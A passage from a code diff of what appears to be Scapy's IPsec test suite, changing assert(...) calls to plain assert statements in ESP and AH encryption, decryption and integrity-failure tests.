sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Transport - AES-CBC - HMAC-SHA1-96 - altered packet @@ -1486,15 +1486,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -1502,7 +1502,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1522,21 +1522,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -1556,7 +1556,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ####################################### = IPv4 / ESP - Transport - AES-GCM - NULL -- ESN @@ -1574,21 +1574,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -1608,7 +1608,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ####################################### @@ -1628,15 +1628,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -1644,7 +1644,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1665,21 +1665,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption * integrity verification should fail try: d = sa.decrypt(e, esn = 0x201) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1701,22 +1701,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d == p) +assert d == p # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -1736,7 +1736,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ####################################### = IPv4 / ESP - Transport - AES-CCM - NULL - altered packet @@ -1756,16 +1756,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -1773,7 +1773,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1794,22 +1794,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - AES-CBC - HMAC-SHA1-96 - altered packet @@ -1828,16 +1828,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -1845,7 +1845,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1866,22 +1866,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - AES-GCM - NULL -- ESN @@ -1900,22 +1900,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### @@ -1935,16 +1935,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -1952,7 +1952,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1974,22 +1974,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption * integrity verification should fail try: d = sa.decrypt(e, esn = 0x3) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2082,22 +2082,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Tunnel - AES-CCM - NULL @@ -2117,16 +2117,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -2134,7 +2134,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2156,14 +2156,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2173,7 +2173,7 @@ d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / AH - Transport - HMAC-SHA1-96 - altered packet @@ -2190,14 +2190,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before decryption e[TCP].sport = 5 @@ -2205,7 +2205,7 @@ e[TCP].sport = 5 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2224,14 +2224,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2241,7 +2241,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / AH - Transport - SHA2-256-128 - altered packet @@ -2258,14 +2258,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e[TCP].dport = 46 @@ -2273,7 +2273,7 @@ e[TCP].dport = 46 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2292,14 +2292,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2309,7 +2309,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / AH - Transport - SHA2-384-192 - altered packet @@ -2326,14 +2326,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e[TCP].dport = 46 @@ -2341,7 +2341,7 @@ e[TCP].dport = 46 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2360,14 +2360,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2377,7 +2377,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / AH - Transport - SHA2-512-256 - altered packet @@ -2394,14 +2394,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e[TCP].dport = 46 @@ -2409,7 +2409,7 @@ e[TCP].dport = 46 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2428,14 +2428,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2445,7 +2445,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / AH - Transport - HMAC-MD5-96 - altered packet @@ -2462,14 +2462,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e[TCP].dport = 46 @@ -2477,7 +2477,7 @@ e[TCP].dport = 46 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2496,14 +2496,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2513,7 +2513,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / AH - Transport - AES-CMAC-96 - altered packet @@ -2530,14 +2530,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e[TCP].dport = 46 @@ -2545,7 +2545,7 @@ e[TCP].dport = 46 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2565,14 +2565,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2582,7 +2582,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / AH - Transport - AES-CMAC-96 - altered packet -- ESN @@ -2600,14 +2600,14 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an AH layer -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e[TCP].dport = 46 @@ -2615,7 +2615,7 @@ e[TCP].dport = 46 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2638,13 +2638,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2654,7 +2654,7 @@ d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / AH - Tunnel - HMAC-SHA1-96 - altered packet @@ -2672,13 +2672,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.dst = '4.4.4.4' @@ -2686,7 